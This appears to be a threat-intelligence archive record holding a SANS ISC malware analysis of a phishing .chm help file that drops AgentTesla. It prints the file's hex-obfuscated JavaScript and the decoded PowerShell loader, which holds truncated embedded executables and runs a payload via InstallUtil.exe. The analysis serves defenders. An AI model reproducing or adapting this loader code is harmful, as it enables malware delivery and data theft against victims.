{
	"id": "f436f245-b90c-465e-83e9-b3d63bcecff3",
	"created_at": "2026-04-06T00:13:29.473625Z",
	"updated_at": "2026-04-10T13:12:14.94961Z",
	"deleted_at": null,
	"sha1_hash": "95003febff0b6a46edf9b40554de01c3b5b4e938",
	"title": "AgentTesla Dropped Through Automatic Click in Microsoft Help File",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 105984,
	"plain_text": "AgentTesla Dropped Through Automatic Click in Microsoft Help\r\nFile\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 21:47:51 UTC\r\nAttackers have plenty of resources to infect our systems. If some files may look suspicious because the extension\r\nis less common (like .xsl files[1]), others look really safe and make the victim confident to open it. I spotted a\r\nphishing campaign that delivers a fake invoice. The attached file is a classic ZIP archive but it contains a .chm file:\r\na Microsoft compiled HTML Help file[2]. The file is named \"INV00620224400.chm\"\r\n(sha256:af9fe480abc56cf1e1354eb243ec9f5bee9cac0d75df38249d1c64236132ceab) and has a current VT score\r\nof 27/59[3].If you open this file, you will get a normal help file (.chm extension is handled by the\r\nc:\\windows\\hh.exe tool).\r\nBut you will see that a Powershell window is popping up for a few seconds and disappears. Let's have a look at\r\nthe file. You can handle .chm files with 7Zip and browse their content:\r\nhttps://isc.sans.edu/diary/rss/27092\r\nPage 1 of 4\n\nThe sub-directories starting with \"$\" and the files starting with \"#\" are standard files in such files but let's have a\r\nlook at the file called \"sdf48df.htm\". As usual, Microsoft provides tools and file formats that are able to work with\r\ndynamic content. This is true for help files that can embed Javascript code. Here is the content of the .htm file:\r\n\u003cscript language=\"javascript\"\u003e\r\nvar kldfdf='|!3C|!68|!74|!6D|!6C|!3E|!0A|!3C|!74|!69|!74|!6C|!65|!3E|!20|!43|!75|!73|!74|!6F|!6D|!65\r\n!73|!65|!72|!76|!69|!63|!65|!20|!3C|!2F|!74|!69|!74|!6C|!65|!3E|!0A|!3C|!68|!65|!61|!64|!3E|!0A|!3C|\r\n!61|!64|!3E|!0A|!3C|!62|!6F|!64|!79|!3E|!0A|!0A|!3C|!68|!32|!20|!61|!6C|!69|!67|!6E|!3D|!63|!65|!6E|\r\n[...code removed...]\r\n!72|!45|!61|!63|!68|!2D|!4F|!62|!6A|!65|!63|!74|!20|!7B|!28|!20|!5B|!43|!6F|!6E|!76|!65|!72|!74|!5D|\r\nvar fkodflg =bb0df4(kldfdf)\r\ndocument.write(unescape(fkodflg));\r\nfunction bb0df4(str) {\r\n return str.split(\"|!\").join(\"%\");\r\n}\r\n\u003c/script\u003e\r\nThe variable kldfdf is easy to decode (it's just a hex-encoded chunk of data):\r\n\u003chtml\u003e\r\n\u003ctitle\u003e Customer service \u003c/title\u003e\r\n\u003chead\u003e\r\nhttps://isc.sans.edu/diary/rss/27092\r\nPage 2 of 4\n\n## Customer service\n\n### Please Wait...\n\n$e00fgfg4=(-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}\r\nsal c0d4s75 $e00fgfg4\r\nfunction AfdEYmOP {  \r\n param($GjruFEh)  \r\n $GjruFEh = $GjruFEh -split '(..)' | ? { $_ }  \r\n ForEach ($aYLEzWVc in $GjruFEh) {    \r\n [Convert]::ToInt32($aYLEzWVc,16)  \r\n }\r\n}\r\n[String]$vhghWAdfB='4D5A9@!@!3@!@!@!04@!@!@!FFFF@!@!B8@!@!@!@!@!@!@!4@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@\r\n[String]$lkgY='1F8B08@!@!@!@!@!04@!CCBD07BC5C45F5387EF7EEEE6DDBDEECEEBB5BDFBB9B7E79FB125228EF2590842A\r\n$dfffgrrr='$b05d.In@@#\u003e@#\u003c\u003c\u003c\u003c\u003c%%%%^^*******\u003e\u003e\u003e\u003c\u003c||||@!!!!!!!@@@@@@@@@ke($null,$null)'.replace('@@#\u003e@#\r\n$jhugrdtf='$dfffgrrr.Lo@@#\u003e@#\u003c\u003c\u003c\u003c\u003c%%%%^^*******\u003e\u003e\u003e\u003c\u003c||||@!!!!!!!@@@@@@@@@($lqct)'.Replace('@@#\u003e@#\u003c\u003c\u003c\u003c\r\n$jhugrdtf| c0d4s75\r\n[Byte[]]$lkgY2= AfdEYmOP $lkgY\r\n[YESS]::f77df00sd('InstallUtil.exe',$lkgY2)\r\nXavier Mertens (@xme)\r\nSenior ISC Handler - Freelance Cyber Security Consultant\r\nPGP Key\r\nSource: https://isc.sans.edu/diary/rss/27092\r\nhttps://isc.sans.edu/diary/rss/27092\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://isc.sans.edu/diary/rss/27092"
	],
	"report_names": [
		"27092"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434409,
	"ts_updated_at": 1775826734,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/95003febff0b6a46edf9b40554de01c3b5b4e938.pdf",
		"text": "https://archive.orkl.eu/95003febff0b6a46edf9b40554de01c3b5b4e938.txt",
		"img": "https://archive.orkl.eu/95003febff0b6a46edf9b40554de01c3b5b4e938.jpg"
	}
}